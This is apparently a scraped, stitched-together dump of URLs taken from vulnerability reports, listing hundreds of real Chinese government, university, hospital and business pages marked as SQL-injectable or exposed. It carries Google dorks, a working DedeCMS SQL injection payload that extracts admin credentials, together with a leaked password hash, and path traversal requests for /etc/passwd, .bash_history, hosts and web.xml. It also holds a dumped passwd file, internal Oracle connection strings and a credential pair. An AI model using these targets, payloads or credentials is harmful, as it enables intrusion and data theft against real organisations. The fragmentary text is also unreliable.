http://www.65565508.com/readnews.asp?id=51 
http://www.wdmjg.com/readnews.asp?id=56 http://www.bangjichina.com/cn/readnews.asp?id=50 http://www.raxcjx.com/cn/readnews.asp?id=52 http://www.yihaomoju.com/readnews.asp?id=53 http://www.shengdongjx.net/readnews.asp?id=59 http://www.66618760.com/readnews.asp?id=20 http://www.8ycn.com/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞第二弹。 http://www.lushengmetal.com/en/products_display.php?keyno=30313 http://www.tianjianchina.com/products_display.php?keyno=29874 http://www.sdxcgd.com/products_display.php?keyno=51467 http://www.sdxinlei.com/products_display.php?keyno=53691 http://www.bzbinhai.com/products_display.php?keyno=52243 http://www.sdmlw.com/products_display.php?keyno=34854 http://www.sdxhyz.com/products_display.php?keyno=51717 http://www.sdsxmm.com/products_display.php?keyno=51831 http://pengxian.8ycn.com.cn/products_display.php?keyno= http://www.bzjdqd.com/products_display.php?keyno=52400 http://www.sdjwd.com/products_display.php?keyno=31240 http://www.sdyssw.com/products_display.php?keyno=61807 http://www.bztianma.com/products_display.php?keyno=51838 http://www.bzajst.com/products_display.php?keyno=52015 http://www.xhzxsw.com/products_display.php?keyno=51595 http://www.bzjzlxs.com/products_display.php?keyno=52057 http://www.bzsdmm.com/products_display.php?keyno=39411 http://www.cnynmy.com/products_display.php?keyno=53349 http://www.bzglsm.com/products_display.php?keyno=32313 http://www.dubangchuye.com/products_display.php?keyno=64251 http://www.bzdelixi.com/products_display.php?keyno=50282 http://www.bzqezl.com/products_display.php?keyno=36732 http://www.hmbaila.com/products_display.php?keyno=51134 http://www.wdxzx.com/products_display.php?keyno=37216 http://www.mituofo.net/products_display.php?keyno=37128 http://www.sdcfcg.com/products_display.php?keyno=35098 http://www.cnjjgm.com/products_display.php?keyno=41677 http://www.bzfyzl.com/products_display.php?keyno=50765 http://www.txjzy.com/products_display.php?keyno=52747 http://www.sdmdxg.com/products_display.php?keyno=39539 
http://www.sdcymc.com/products_display.php?keyno=28094 http://www.sdhyjx888.com/products_display.php?keyno=36076 http://zhzzdz.com/products_display.php?keyno=58229 http://www.sdjsqjt.com/products_display.php?keyno=45443 http://huoguoyu.com/products_display.php?keyno=47006 http://bzxsdbj.cn/products_display.php?keyno=53870 http://www.bzbingang.com/products_display.php?keyno=59177 http://www.hmlxmy.com/products_display.php?keyno=51369 http://www.ysddc.com/products_display.php?keyno=51641 http://www.zphbsjc.com/products_display.php?keyno=42053 http://www.sdchunxiang.com/products_display.php?keyno=9926 http://www.bzbygc.com/products_display.php?keyno=41705 http://www.kdspjx.com/products_display.php?keyno=37753 http://admin.qa.gameplus.sdo.com www.m10060.com http://www.m10060.com:80/ www.m10060.com http://61.49.17.106 http://zhidao.yinyuetai.com/redirct_index.htm http://127.0.0.1/diguo7/e/ShopSys/address/AddAddress.php?enews=AddAddress http://127.0.0.1/diguo7/e/member/mspace/?enews=DelMemberGbook&gid=4 http://youwu.jiemian.com http://youwu.jiemian.com http://east.ent.9you.com/butterfly/index.php?r=News/GetNewsList&order=comment&num=10&page=1&author=42【注入点】&jsonp=jQuery19104597843303345144_1412652260947&_=1412652260952 http://www.toread.com.cn/ftadmin/login.php?gotopage=%2Fftadmin%2Findex.php http://自己网站/a.js http://lhshop.9you.com/itemlist.php?pid=1&type=【注入点】&sex=2&s=11 http://oa.gwbnsh.net.cn/FCKeditor http://oa.gwbnsh.net.cn/Member/MemberDelete.aspx http://oa.aqtc.edu.cn/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Aflavor%3DURL%2Ctype%3DDeploymentScanner http://61.163.228.116:7001/upload/up04/163/mkzy.jsp http://xszz.njtech.edu.cn/),发现SQL注入点一个:http://xszz.njtech.edu.cn/showart.asp?cat_id=12&art_id=1581 http://xszz.njtech.edu.cn/admin.asp www2.bjfu.edu.cn/yzh/admins/admin_index.asp http://www.cctrl.net/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 http://www.xxxx.com/cctrl/admin/ad_login.php http://forland.foton.com.cn/wap/new_detail.php?id=213&sortid=2 
http://www.qingdaozhn.com/new_detail.php?id=211&sortID=4 http://www.jinhai.net.cn/new_detail.php?id=482&sortid=30&pID= http://www.51future.cc/new_detail.php?id=10&sortid=13 http://www.haizhoutd.com/new_detail.php?id=18&sortid=10 http://www.xinshunjiaju.com/new_detail.php?id=135 http://www.chinaxnny.com/new_detail.php?id=3&sortid=9 http://www.qdkqwy.com/new_detail.php?sortid=17&id=203 http://www.dxrq.com/new_detail.php?id=22&sortid=9 http://www.cymchina.com/new_detail.php?id=5&sortid=10 http://tianzhengjiaye.com/new_detail.php?id=54 http://yhlmy.com/new_detail.php?id=5&sortid=9 http://sekisuijushichina.com/new_detail.php?id=5 http://www.haiyuankuaiji.com/new_detail.php?id=64 http://water-green.com/new_detail.php?id=91&sortid=11 http://101.227.9.90/ http://218.10.43.102:8081/assess/ http://116.211.29.183:8080/scripts/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://116.211.29.184:8080/scripts/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://116.211.29.172/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://wxy.hqu.edu.cn/hqdx/jqjdx.asp?id=15 http://sd.189.cn/resource20140218.tar http://www.gdbbk.com/gdbbk.com.rar http://xinyi.creditease.cn/ajax.do?action=download&file=../../../../../../../../../../etc/passwd xinyi.creditease.cn/ajax.do?action=download&file=../../../../../../../../../..//home/xinyi/.bash_history http://xinyi.creditease.cn/webadmin/login.jsp http://www.gps199.cn/login.aspx http://116.211.28.18/rpl/ mir3:mir3 http://wooyun.org/bugs/wooyun-2014-078950 http://101.227.2.70/search/ http://jinjiangcard.com/ http://wooyun.org/bugs/wooyun-2010-031239 http://mstore.wo.com.cn/index.action http://mstore.wo.com.cn/haha.jsp http://www.lygdfrcb.com/ckfinder/ckfinder.html?action=js&func=SetFileField&data=xPicture&thumbFunc=ShowThumbnails&start=Images.asp%3A%2F%3A0 http://www.lygdfrcb.com/ckfinder/ckfinder.html http://210.37.0.36/ http://210.37.0.57:88/edoas2/oa.jsp http://210.37.2.90/ 
http://ningxia.12388.gov.cn/xcms/nxlzjb/Jubao.do http://www.cicro.com/ inurl:jsp/zwgk/ http://www.yanliang.gov.cn/jsp/zwgk/browser/main.jsp?deptid=yanl000051 http://www.jingbian.gov.cn//jsp/zwgk/browser/content.jsp?id=5051 http://www.gsjyg.cn//jsp/zwgk/browser/content.jsp?id=3688 http://nanyang.gov.cn//jsp/zwgk/browser/wcontent.jsp?id=10973&nodeid=ny00001859&siteid=ny%27 http://www.xy.gov.cn//jsp/zwgk/browser/content.jsp?id=295 http://sj.shufe.edu.cn//jsp/qikan/browser/content.jsp?id=4344 http://www.xjmd.gov.cn//jsp/zwgk/browser/content.jsp?id=2864 http://democn.shop-builder.cn/ https://github.com/ulinke/phpb2b/archive/master.zip http://111.13.51.233:8080/index.action http://en.shop-builder.cn/main.php?m=member&s=admin_orderadder http://122.227.164.8/gps/login.jsp url:http://student.gaosiedu.com/KnowledgeTree/Function/KnowledgeTree.ashx?cmd=GetKnowledgeClassLesson&sKnowledgeCode=1 http://web.hrbnu.edu.cn/mkszyxy http://web.hrbnu.edu.cn/mkszyxy/admin/ http://www.wayboo.cn/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 http://www.xayfds.net/pics.php?class=215 http://www.shfuhai.com/pics.php?class=26 http://www.bdjyjx.com/pics.php?class=33 http://www.pbdt360.com/pics.php?class=396 http://www.lilongeps.cn/pics.php?class=60 http://www.xhbzdc.com/wap/pics.php?class=122 http://www.bjznxf.com/pics.php?class=69 http://www.qiqiangjx.com/pics.php?class=19 http://bibojsj.com/pics.php?class=108 http://www.sxtongtu.com/pics.php?class=51 http://www.zzpjjg.com/pics.php?class=42 http://www.jndsmm.com/pics.php?class=54 http://www.changchunyida.com/wap/pics.php?class=107 http://www.lnsbhg.com/wap/pics.php?class=35 http://www.xawhmc.com/pics.php?class=136 http://sjzbangongjiaju.com/pics.php?class=63 http://www.bjqzxr.net/pics.php?class=66 http://kyfcan.com/pics.php?class=58 http://www.lilongeps.com/pics.php?class=81 http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt http://www.yqcqfda.gov.cn/docc/shownews1.asp?id=589 http://www.yqcqfda.gov.cn/adminqibo5/Login.asp https://pub1.mca.gov.cn:8443/ 
www.shanghaicentre.com/download.php?file=download.php http://oa.tongji.edu.cn/login/Login.jsp?logintype=1 http://oa.tongji.edu.cn/wui/theme/ecology7/page/login.jsp?templateId=21&logintype=1&gopage=&languageid=7&message=17 inurl:yktguanli http://pay.4399.com/pay_to_show.php?orderId=订单号 http://dns.www.net.cn/tcdomainretrieval/sendauthcode http://ca.its.csu.edu.cn/home/login http://tieba.baidu.com/p/1482903508?pid=18336668015&cid=0#18336668015)找到的一个学工号111612527,得知前两位是代表11级。 http://my.its.csu.edu.cn/MyInformation/MyPasswordModify_2/141611166 http://nbic.ujn.edu.cn/sdpklnbic/nbicnews/echobin.php?id=1 http://www.qzyixiaotong.com/ischool/login.jsp www.qzyixiaotong.com http://www.qzyixiaotong.com inurl:/opac_two/search2 http://211.151.175.47 http://211.151.175.47/loginact.php http://211.151.175.47/usermanage/admin_adduser.php?id=2 http://211.151.175.48/ http://211.151.175.47/ http://211.151.175.48/loginact.php http://211.151.175.48/usermanage/admin_adduser.php?id=2 http://www.epp.ac.cn/activity.asp?NewsTypeId=2 http://www.epp.ac.cn/allContent.asp?NewsTypeId=1 http://www.epp.ac.cn/NewsView.asp?NewsId=267 http://www.wom186.com/smzdj http://www.hebcar.com/fckeditor/editor/filemanager/connectors/test.html http://sdkhttp.eucp.b2m.cn/sdk/SDKService?wsdl,0,3687 http://www.jissbon.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878 admin:9627739dc34a7c300cbb| http://www.jissbon.com/plus/ad_js.php?aid=1 http://www.jissbon.com/include/ http://www.jissbon.com/data/ http://xbbjb.nau.edu.cn/view_news.aspx?id=20131114101314001 inurl:/authorLogOn.action?mag_Id= http://www.jnr.ac.cn/journalx_zrzy/authorLogOn.action?mag_Id=1 http://www.iwt.cn/journalx_gyscl/authorLogOn.action?mag_Id=1 
http://gclx.tsinghua.edu.cn/JournalX_gclx/authorLogOn.action?mag_Id=1 http://ctp.itp.ac.cn/journalx_llwl_en/authorLogOn.action?mag_Id=1 http://118.145.16.213:8080/journalx_jryj/authorLogOn.action?mag_Id=1 http://www.zgsyhlzz.com:8080/journalx_syhl/authorLogOn.action?mag_Id=7 http://cea.ceaj.org/journalx_jsjgc/authorLogOn.action?mag_Id=1 http://newlva.chinaelc.cn/journalx_dydq/authorLogOn.action?mag_Id=1 http://www.lyxk.com.cn/JournalX_lyxk/authorLogOn.action?mag_Id=1 http://www.chinchemlett.com.cn/journalx/authorLogOn.action?mag_Id=7 site:dayoo.com inurl:api http://bm.huatu.com/data.rar http://ljlwx.speiyou.com/lejiale/login/login_index.action http://yingyuzizhao.speiyou.com/SHenglish/login!toLogin.action http://whuodong.speiyou.cn/weixinbaoming/login/login_index.action http://tjj.stats-sh.gov.cn/rkpc/moban.asp?id=769 wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18 wxy.hqu.edu.cn/hqdx/ggfw.asp?id=18 http://sqlmap.org http://www.gtfg.gov.cn/detail/news.asp?nid=1401 http://www.bdghj.gov.cn/user/view.asp?id=4122 http://42.121.252.129/admin/home/Login http://www.wmfww.gov.cn/NewsView.asp?id=54 https://120.194.234.178:8081/welcome.php http://job.100tal.com http://job.100tal.com:80/ http://www.yw365.gov.cn:9999/admin/downLoadGonggaoAtta.action?filePath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts&fileName=1.txt http://www.alsxzsp.gov.cn/htmlylc/downLoadGonggaoAtta.action?filePath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts&fileName=1.txt http://www.zwfw.gov.cn/1664zwts/downLoadGonggaoAtta.action?filePath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts&fileName=1.txt http://www.cnhuashuo.com/ inurl:productview.asp http://www.zy-hyd.com/productview.asp?id=1 http://www.mblamps.com/productview.asp?id=60 http://www.cnquansheng.com/productview.asp?id=34 http://www.ap-pump.com/productview.asp?id=122 http://www.cnlaihe.com/productview.asp?id=90 http://www.mohe-pc.com/productview.asp?id=1 http://www.china-taiyide.com/productview.asp?id=29 
http://www.nb-jydz.com/productview.asp?id=11 http://www.nbhansen.com/productview.asp?id=34 http://www.nbtybxg.com/productview.asp?id=1 http://www.jbclamps.com/productview.asp?id=152 http://www.nblongxiang.com/productview.asp?id=1 http://www.lk-spbzjx.com/productview.asp?id=21 http://www.nbysd.com/productview.asp?id=54 http://www.nbck168.com/productview.asp?id=1 http://www.fhdzlz.com/productview.asp?id=3 http://www.peryew.com/productview.asp?id=149 http://yyghsz.com/productview.asp?id=2 http://www.cxmzy.cn/productview.asp?id=7 http://www.nbhggz.com/productview.asp?id=10 http://www.yxlamps.com/productview.asp?id=160 http://www.yyszwj.cn/productview.asp?id=1 http://www.linyijieju.com/productview.asp?id=19 http://www.liaoming-dengju.com/productview.asp?id=87 http://www.nbblth.com/productview.asp?id=44 http://www.nbrenteng.com/productview.asp?id=25 http://119.161.147.29/userLogin.aspx http://218.200.202.109:8000/Login.aspx http://tx3.netease.com/ http://xy2.netease.com/ http://xy3.netease.com/ http://wh.netease.com/ http://y3.netease.com/ http://zh.netease.com/ http://jl.netease.com/ http://zd.netease.com/ http://cc.netease.com/ http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt http://map.sogou.com/bbs/ http://www.einfo.net.cn/home2012/onews.asp?id=1434 http://www.einfo.net.cn/home2012/onews.asp?id=1434 https://itunes.apple.com/cn/app/bing/id345323231?mt=8 http://test.m4sk.net/phone.html tel:10086 http://feedback.doshow.com.cn/feedback/addFeedback.action http://yn.189.cn/shop/query/my_order/order_detail.jsp?ord_code=**************&phone_num=*********** inurl:yn.189.cn/shop/query/my_order/order_detail.jsp?ord_code= http://www.hrbcb.com.cn/card/service.do http://www.hrbcb.com.cn/card/merchant.do http://museum.ustb.edu.cn/data/mysql_error_trace.inc http://ucenter.enet.com.cn/avatar.php?uname=igrid2013'&size=samll http://www.cctrl.net/)开发的某套CMS程序用于多数网站,并且存在同一注入漏洞 inurl:news.php?sortid= 
http://www.xxxx.com/cctrl/admin/ad_login.php forland.foton.com.cn/wap/news.php?sortid=3 http://www.qdnwj.com/news.php?sortID=8 www.qingdaozhn.com/news.php?sortID=4 www.qdjfyjd.com/news.php?sortID=53 www.xdl-china.com/news.php?sortID=10 www.qdzhongze.com/news.php?sortid=3 www.blwhcb.com/news.php?sortid=10 www.qdxcfj.com/news.php?sortID=5 http://www.oukem.com/news.php?sortid=12 www.dehewuye.com/news.php?sortid=45 www.qdjiarun.net/news.php?sortID=2 www.qddbzj.com/news.php?sortID=7 www.weihaishanghui.com/news.php?sortid=41 www.jinhai.net.cn/news.php?sortid=48 www.qdtmjg.com/news.php?sortid=12 www.quannengchina.net/news.php?sortID=10 www.qdhengxin.net/news.php?sortid=56 www.51future.cc/news.php?sortid=50 www.sakuraqd.com/news.php?sortid=17 www.yimucg.com/news.php?sortid=10 www.qdbast.com/news.php?sortid=9 www.qdkqwy.com/news.php?sortid=16 www.qdtongxueguan.com/news.php?sortid=14 www.shanhaitian.com/news.php?sortID=12 www.ssjs-china.com/news.php?sortid=10 www.qdfzsz.com/news.php?sortID=18 www.qingyuan7.com/news.php?sortID=12 www.qingdaozhongzhixin.com/zhongxin/news.php?sortid=16 www.qdouren.com/news.php?sortID=5 www.donghaichina.net/news.php?sortID=11 www.qdouren.com/news.php?sortID=54 www.qingdaozhongzhixin.com/zhongxin/news.php?sortid=16 www.qdcjw.com/news.php?sortID=4 www.jhdgyp.com/news.php?sortid=8 www.qdbes.com/news.php?sortid=8 www.tairuilong.com/news.php?sortid=5 http://**.**.**/还有部分目录遍历的情况!这个是在游戏配置文件中找到的!_ http://m.roboo.com/ http://app.roboo.com/app/download.htm http://union.cqvip.com/FindPWD2.asp?UserName=admin http://union.cqvip.com/checkusername.asp?UserName=admin http://uxss.sinaapp.com/index.php http://yaoguobbs.duowan.com http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt http://forum.meizu.com/ http://**.**.**/dzvul/sodb/19/sodb-2010-01.txt http://222.204.208.4/Site/model/TwoGradePage/stuyuxi/gzzd.aspx?id=1 http://dxsb.qfnu.edu.cn/model/TwoGradePage/stuyuxi/gzzd.aspx?id=16 http://182.129.150.10:8001/model/TwoGradePage/stuyuxi/gzzd.aspx?id=32 
http://202.206.48.106/model/TwoGradePage/stuyuxi/gzzd.aspx?id=13 http://labch.cumt.edu.cn:81/model/TwoGradePage/stuyuxi/gzzd.aspx?id=15 http://dxsb.qfnu.edu.cn/model/TwoGradePage/stuyuxi/gzzd.aspx?id=16 http://zz.sdlgzy.com/site/train/gzzd.aspx?id=663 http://hywl.nbu.edu.cn/model/TwoGradePage/stuyuxi/gzzd.aspx?id=11 http://wsdj.baic.gov.cn/ http://wsdj.baic.gov.cn/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector jdbc:oracle:thin:@172.25.78.227:1521:ORCL jdbc:oracle:thin:@192.168.100.11:1521:orcl http://kfmail.sdo.com/ IP:218.29.140.102 https://mail.cnachk.com/ http://w.51tv.com/51tv/dtl.jsp?id=757573755 http://w.51tv.com/51tv/dtl.jsp?id=757573755 http://114.255.12.121/user_logout.action http://www.nyagri.gov.cn/FCKeditor/editor/filemanager/upload/test.html http://www.cmfhk.com/news_type.asp?id=471 http://b.agent.fang.com/magent/House/trade/HouseManager.aspx?action=del&id=8888 http://b.agent.fang.com/magent/House/trade/HouseManager.aspx?action=del&id=52707 www.ykdfdj.gov.cn/newsinfo.php?id=26 www.sxxd.gov.cn/include/content.php?id=843 www.sxlgz.gov.cn/vote/index_show.php?pid=1 www.pd12333.gov.cn/templets/xuejing.php?id=2908 www.jzjzy.gov.cn/zwgklist.php?infoclass=3 cyxmk.hbjyj.gov.cn/details.php?id=86 jsfamous.js.cei.gov.cn/cybj1.php?id=1391 jdz.nbfet.gov.cn/detail.php?id=22 rs.shouxian.gov.cn/bbjg/index.php?id=108&ty=108 sldx.ww.gov.cn/dwjs/index.php?ty=529 ldjc.cckc.gov.cn/show.php?classid=6&id=169 jsfamous.js.cei.gov.cn/cybj1.php?id=1391 dwzwgk.shitai.gov.cn/list/list_2.php?pid=21&ty=22 zkzx.nwnu.edu.cn/zkcs/zkcs_show.php?zkcs_id=1 zgz.ahhs.gov.cn/inter/index.php?id=4 yyshx.ctgu.edu.cn/list.php?fid=6 yxyx.ctgu.edu.cn/list.php?fid=41 xsc.xynun.edu.cn/list.php?bid=98 xzold.ahhs.gov.cn/include/show_news.php?id=1270 www.zljmz.gov.cn/list.php?cid=1 www.zgshuiwu.gov.cn/news.php?id=321 www.zg12333.gov.cn/uploadnews/2011118110212_20825.php?id=423 www.ykrcw.gov.cn/cgzs.php?sid=7 www.ykjt.gov.cn/jtgk.php?id=1 www.ykbh.gov.cn/tzhj.php?id=3 
www.yjfan.net/index.php?m=new_look&typeid=5&id=43 www.wjxrd.gov.cn/include/web_content.php?id=82596 www.wjxtjj.gov.cn/include/web_content.php?id=82741 www.wjyt.gov.cn/include/web_content.php?id=82546 www.wjxjt.gov.cn/list/index.php?zlm=900&ty=2030 www.wjxcg.cn/include/web_content.php?id=76625 www.wjsj.gov.cn/vote/result_view.php?id=40 www.wjlzw.gov.cn/banshi/index.php?pid=34&ty=35 www.wjmzj.gov.cn/include/diaocha_view.php?id=6 www.wjlsj.gov.cn/include/web_content.php?id=82271 www.wjcl.gov.cn/include/web_content.php?id=78246 www.whycyjy.sdu.edu.cn/articel_view.php?id=324 www.lyh.wust.edu.cn/ggtzShow.php?action=20&ggtzID=148 www.mjzgsw.gov.cn/news.php?id=162 www.hbdj.gov.cn/include/view_jgzn.php?id=21 www.haxx.lss.gov.cn/msg/investigation.php?invesid=1 www.gnhz.sdu.edu.cn/about.php?id=7 www.fxxkjj.gov.cn/kpyd/index.php?ty=44 www.fl.ldu.edu.cn/about.php?f_type=2 www.cyzzb.gov.cn/uploadnews/123655869323895.php?id=612 www.bledu.gov.cn/tdjs.php?cat_id=28 wsxx.cdu.edu.cn/about/About.php?ID=1 www.ahdzch.gov.cn/about.php?left=1&art_id=2 wlsy.sut.edu.cn/main/homeAnnounceDetail.php?id=51 tyxy.ctgu.edu.cn/list.php?fid=1 tmyjz.ctgu.edu.cn/list.php?fid=5 tcold.ahhs.gov.cn/include/show_news.php?id=830 sthj.ctgu.edu.cn/list.php?fid=1 sope.ruc.edu.cn/displaynews.php?id=206 sldx.ww.gov.cn/dwjs/index.php?ty=529 sjj.ahhs.gov.cn/jgjs.php?S_ty=43 qzlx.cumtb.edu.cn/info.php?id=432 radio08.cumtb.edu.cn/news.php?id=141959 qzlx.aqcz.gov.cn/show.php?id=420 pksy.xjtu.edu.cn/newsDetail.php?type=&newsID=201 mua.whu.edu.cn/jijin-detail.php?recordID=1 mcchm.ctgu.edu.cn/list.php?fid=1 mhjl.jlta.gov.cn/item.php?id=35 mcxf.quanjiao.gov.cn/xf/show.php?id=60&tid=761 logic.swu.edu.cn/zxdt5.php?id=191 ltz.ahhs.gov.cn/about.php?S_ty=43 ldjc.cckc.gov.cn/show.php?classid=6&id=169 jiwei.hebau.edu.cn/list1.php?cid=2 fao.hebut.edu.cn/news_sub.php?id=346 esd.gdsyzx.edu.cn/about.php?cid=11014 english.qqhr.gov.cn/xinwen.php?id=210 dangxiao.ustc.edu.cn/theory_detail.php?id=44 
dwzwgk.shitai.gov.cn/list/list_2.php?pid=21&ty=22 cyxmk.hbjyj.gov.cn/details.php?id=86 cbrc.yxy.wmu.edu.cn/news_content.php?id=27 bwc.ctgu.edu.cn/list.php?fid=5 100.cumtb.edu.cn/info.php?id=208 http://www.cnlaw.cn http://**.**.**/callcenter_new/file/a.jspsort=1&file=%2Fetc%2Fhosts root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:159:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin nagios:x:500:500::/home/nagios:/bin/bash mysql:x:101:160:MySQL server:/var/lib/mysql:/bin/bash oracle:x:501:501::/home/oracle:/bin/bash 
oracle:dba http://www.cqsxzxyy.com/fy/jij/View.asp?id=474 http://www.cd120.com/departAnddocSearch.jspx?outpatientDate=&dointdept=&department=&clinicgroup=&speciality=&doctorname=1 http://m.xiamenair.cn/ http://bbs.jj.cn/viewthread.php?tid=2424793&extra=page%3D1, http://220.180.203.210/index.action http://220.180.203.210/servlet/FileDownload?filepath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts http://www.ordos.gov.cn/ http://www.ordos.gov.cn/swssp/servlet/FileDownload?filepath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts http://www.yk.gov.cn:3721/zwgk/ http://www.yk.gov.cn:3721/zwgk/servlet/FileDownload?filepath=C%3a%5cwindows%5csystem32%5cdrivers%5cetc%5chosts http://ting.weibo.com/music/weidanmobile/add?sid=2858931&gid=defaultid&key=f10aba96cdedec5df88cdaf6371d9ebf&token=5e04af60a57bc0b130ac9550f879b86e&plat=pc http://cas.yundasys.com/pma/index.php http://www.dysjw.gov.cn/LeaderShow.asp?lid=1 http://116.211.21.204/bbs/bbs.rar,我换成了 http://116.211.21.204/bbs.rar,cao,直接下载了,我也是醉了,你们就不能登陆到服务器稍微检查下?。。 http://xiazai.sogou.com http://www.runoqd.com/左边的2个管理系统 http://58.58.34.98:8190/MainForm.aspx http://58.58.34.98:8096/MainForm.aspx http://www.wxrunoqd.com/ shmc.shmu.edu.cn/admin/admin_login.aspx http://automation.xupt.edu.cn/article.php?pid=3 http://gr.xidian.edu.cn/paginationAction.do?id_xxnr=18 http://sjjx.xidian.edu.cn/dede3/dede/test.php?action=SUExp http://see.xidian.edu.cn/youth/e/admin/index.php http://sjjx.xidian.edu.cn/dede3/include/config_base.php http://scsgkyy.com/keshi.aspx?type=87 http://123.125.84.97/dgpt/search.php?word=xxooxoxoxoxoxo http://123.125.84.97/dgpt/search.php?word=xxooxoxoxoxoxo http://fn-sso.ceair.com:7010/sso/cmd.jsp jdbc:oracle:thin:@172.20.34.234:1521:fxw3db1 http://tw.qust.edu.cn/gzsc/index.asp?page=2&classid=19&Nclassid=34 http://jw.qust.edu.cn/jwlist.asp?ClassID=3 http://jw.qust.edu.cn/Admin_Login.asp登陆后可上传文件。 http://jw.qust.edu.cn/admin_index.asp http://www.xgskjj.gov.cn/xgkjj/login.php 
http://www.whrcbank.com、http://202.103.25.14:8081/whrcbank,其中http://www.whrcbank.com是反向代理服务器。目标网站存在多处安全漏洞,如下: http://www.whrcbank.com/upload/ http://www.whrcbank.com/downLoad?fileName=../WEB-INF/web.xml http://www.ycks.gov.cn/jkzsec.php?id=13488 http://**.**.**/pages/xxfb/editor/uploadAction.action inurl:/kdgs/ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/_ http://**.**.**/kdgs/ http://chinese.nenu.edu.cn/ http://chinese.nenu.edu.cn/show_news.php?id=991 http://oa.t3.com.cn http://oa.t3.com.cn/Share/OrgUpFile.aspx inurl:ws2004/ http://www.suyaxing.com:81/ws2004/Model/login.asp inurl:cms/Column.aspx?LMID= inurl:/cms/Article.aspx?NRID= http://www.zchospital.com/cms/Article.aspx?NRID=12774&LMID=47 http://www.zjhl.org/cms/article.aspx?nrid=446&lmid=125 http://ywzxyy.com/cms/Article.aspx?NRID=10000131&LMID=41 http://sig.cem.org.cn/cms/Article.aspx?NRID=16525&LMID=29 http://www.hnzyy.cn/cms/Article.aspx?NRID=12541&LMID=105 http://oa.ywwsj.gov.cn/oa/cms/article.aspx?nrid=2853 http://www.zjqhyy.com/cms/article.aspx?nrid=13125&lmid=24 http://www.z2hospital.com/cms/Article.aspx?NRID=13440&LMID=153 http://www.zchospital.com/cms/Article.aspx?NRID=12774&LMID=47 http://www.zjhl.org/cms/article.aspx?nrid=446&lmid=125 http://sig.cem.org.cn/cms/Article.aspx?NRID=16525&LMID=29 http://www.z2hospital.com/cms/Article.aspx?NRID=13440&LMID=153 http://www.zjxsh.com/oa/login.aspx http://ywzxyy.com/login.aspx http://www.zjhl.org/hlzk/login.aspx http://www.zchospital.com/login.aspx http://www.zjkq.com.cn/login.aspx http://sig.cem.org.cn/login.aspx http://www.hnzyy.cn/login.aspx http://www.fysrmyy.com/login.aspx http://www.zjqhyy.com/login.aspx http://www.zjtongde.net/login.aspx http://www.zjxsh.com/oa/login.aspx www.zjxsh.com http://www.zjxsh.com http://soft.zzti.edu.cn/webcotorl/listcont.aspx?newsid=&typeid=202&typename=%B5%B3%BD%A8%B9%A4%D7%F7&secondname=%BD%CC%B9%A4%D6%AE%BC%D2 
